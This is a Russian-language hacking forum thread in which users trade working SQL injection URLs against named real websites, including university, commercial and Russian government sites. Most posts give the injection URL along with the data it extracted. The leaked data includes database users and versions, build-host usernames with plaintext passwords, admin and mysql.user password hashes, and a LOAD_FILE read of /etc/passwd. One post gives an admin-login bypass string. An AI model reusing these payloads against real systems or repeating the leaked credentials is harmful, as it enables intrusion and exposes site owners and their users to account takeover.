19.10.2007, 22:11
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.monbat.com/index.php?l_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4/*&change_lang=yes
DOTSTUDIO@LOCALHOST:5.0.45-LOG:WEB
Код:
http://www.oursportscentral.com/services/maps/largemap.php?l_id=-1'+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5/*
oursport_public@localhost:4.1.20-log:oursport_osc
Код:
http://www.rentayacht.gr/location.php?l_id=-1+union+select+1,2,3,4,5,aes_decrypt(aes_encrypt(version(),0x71),0x71),7,8,9,10,11/*
Код:
http://www.oli-lacke.de/firma.php?m_id=1&l_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8/*&lang=ru
ftp33970@manganese.webpack.hosteurope.de:5.0.32-Debian_7etch1~bpo.1-log:oli_lacke_de
Код:
http://www.ntnui.no/ogruppa/paamelding/paameldingsliste.php?l_id=9999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16/*
ogruppa_db@textus8.itea.ntnu.no:4.0.18-Max:ogruppa_db |
|
|
19.10.2007, 22:19
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585
Репутация:
818
|
|
_http://www.ppckernel.org/tree.php?id=-3+union+select+1,concat_ws(0x3a,name,pass,hostname ),3+from+buildhosts
dev:Jahdeha5:dev.build.ppckernel.org
hercules:hohKie4r:hercules.xorsis.com
hermes:Chofei5w:hermes.ppckernel.org
m2:yie7Phoi:m2.bccd.cluster.earlham.edu
c15:lohcooD2:c15.cluster.earlham.edu
acl2:eeceaZ8u:acl2.cs.earlham.edu
tobias:tmb2h3a:tobias.cluster.earlham.edu
hermes64:Chofei5w:hermes.ppckernel.org
_http://www.dccentralkitchen.org/program.php?id=3+union+select+1,username,password, 4,5,6+from+users
admin:c84258e9c39059a89ab77d846ddab909 мд5()
admin:admin2
|
|
|
|
20.10.2007, 00:30
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.infohotel.ru/hotel.php?district=0&subway=0&room=0&price=0&searc h=2&page=0&id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user())/*
5.0.27/petroholru_info/petroholru@81.177.16.81 доступ к information_schema есть. ничего толкового не нашел
http://sovetnik-n.spb.ru/shownews.php?id=-1+union+select+1,2,3,concat(version(),0x2F,databas e(),0x2F,user()),5,6,7,8,9,10/*
4.1.20/sovetnik_n/sovetnik_n@localhost
|
|
|
|
20.10.2007, 09:15
|
|
Постоянный
Регистрация: 23.04.2007
Сообщений: 646
Провел на форуме:
4901399
Репутация:
1035
|
|
Всероссийский туроператор свадебных путешествий
Код:
http://www.pssp.ru/services.php?s=999999999999+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(DATABASE(),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16/*
юзер:dbu_galeeva_1@192.168.3.74
база:db_galeeva_1
версия:4.1.18 |
|
|
|
20.10.2007, 10:17
|
|
Участник форума
Регистрация: 14.12.2006
Сообщений: 211
Провел на форуме:
1541753
Репутация:
552
|
|
Код:
http://geolog.mnr.gov.ru/part/?pid=-1/**/union/**/select/**/1,LOAD_FILE('/etc/passwd'),3/*
|
|
|
|
20.10.2007, 10:45
|
|
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468
Репутация:
1224
|
|
Код:
http://gostorgi.ru/z/tenders.php?tt=9999&rc='+union+select+1,2,user,password+from+mysql.user/*
1. root — 72f840f85cf3bb40
2. gostorgi — 72f840f85cf3bb40 |
|
|
|
20.10.2007, 12:34
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122
Репутация:
874
|
|
2 ElteRUS
По поводу http://www.infohotel.ru
Тут есть более серьезная иньекция. http://www.infohotel.ru/admin/ в поле логин пишем 1' or 1=1/* в поле пароль любое. Мы в админке...
доступ к information_schema есть. ничего толкового не нашел
Незнаю как ты но я нашел таблицу spb_users, в ней поля username, password, там значения
username-admin
password-3fe4220069643d6d
Сильно подозреваю что это для входа в админку 
Но ввиду 1' or 1=1/* становиться неактуальным, тем более что хеш я не расшифровал. |
|
|
|
20.10.2007, 17:06
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
http://www.fnews.ru/archive.php?s=news&id=-1+union+select+1,2,3,4,concat(username,char(64),us er_password,0x25,user_email),6,7,8,9,10,11,12+from +phpbb_users+limit+1,1/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
20.10.2007, 18:43
|
|
Познающий
Регистрация: 24.07.2007
Сообщений: 31
Провел на форуме:
1417840
Репутация:
35
|
|
Код:
http://www.bsu.edu.ru/utils/download.asp?idf=1+and+1=@@version--
|
|
|
|
20.10.2007, 19:27
|
|
Участник форума
Регистрация: 08.09.2007
Сообщений: 211
Провел на форуме:
5076186
Репутация:
778
|
|
Код:
http://www.adamproject.net/dispositif.php?id_j=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7/*
adam@localhost:5.0.32-Debian_7etch1-log:adam
Код:
http://lesminots.com/resume0304.php?id_j=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
ocblklesmin@10.0.64.33:5.0.26-log:ocblklesmin
Код:
http://www.bonus33.pl/oferta.php?id_z=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*
poczta_bonus@localhost:5.0.33-log:poczta_bonus
Код:
http://www.tswisla.pl/wislamcarthur/inc/zawodnik.php?id_z=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5,6,7,8,9,10/*
5.0.24-Debian_0.dotdeb.0-log |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
